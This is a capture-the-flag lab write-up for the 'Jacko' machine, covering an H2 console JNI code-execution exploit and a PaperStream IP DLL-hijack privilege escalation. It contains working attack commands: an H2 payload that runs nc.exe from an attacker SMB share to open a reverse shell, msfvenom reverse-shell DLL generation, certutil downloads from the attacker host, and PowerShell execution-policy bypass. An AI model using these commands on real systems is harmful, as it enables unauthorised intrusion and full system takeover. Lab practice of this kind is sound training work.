Jacko

PG Practice Jacko writeup

Nmap

sudo nmap 192.168.67.66 -p- -sS -sV        

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 8082 we have a login page for H2 Console. Connecting with the default inputted values allows login to the console.

Once logged in we can see that we are running on H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection using Java.

H2 Database 1.4.199 - JNI Code ExecutionExploit Database

The following snippet is the vulnerable code we need to run on the H2 Console:

The section of the code that executed commands on the target machine has been shown below. To achieve code execution I set up a SMB Server on my attacking machine with Impacket's SMBserver.py script and ensured nc.exe was in the specified SMB share.

-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');

First set up a SMB server:

python2 smbserver.py -smb2support Share /home/kali/

Then paste the code from exploit-db into the SQL statement section of the website and ensure the --evaluate script section has the command for calling nc.exe on the attacking machines SMB server.

When ready run the SQL statement and we should see authentication on smbserver.py

And then shortly after catch a reverse shell on our netcat listener.

First we need to fix PATH on the target machine as shown below:

set PATH=%SystemRoot%\system32;%SystemRoot%;

Looking through Program files (x86) we can see a directory called PAPERSTREAM IP. Looking for exploits on exploit-db takes us to the following:

PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege EscalationExploit Database

The description for this exploit is shown below:

A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
for a writable location, copies the specified DLL to that location and then
triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
named pipe.

# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444 
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"

We need to change the DLL name generated by msfvenom and the payload location. When I attempted to download exploit to c:\windows\temp my file was deleted instantly. Possibly by AV?

First I generated a msfvenom shell to the name of the DLL required which is UninOldIS.dll. msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082

Then changed the payload file variable to the users Desktop.

At this point move into the users Desktop then use certutil to download the files as when copying by SMB I could get the payload to trigger without issues.

certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll

Start a netcat listener on the attacking machine to listen in on port 8082. Then execute the Powershell exploit.ps1 on the target machine.

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1

A short while later we should receive a shell as SYSTEM.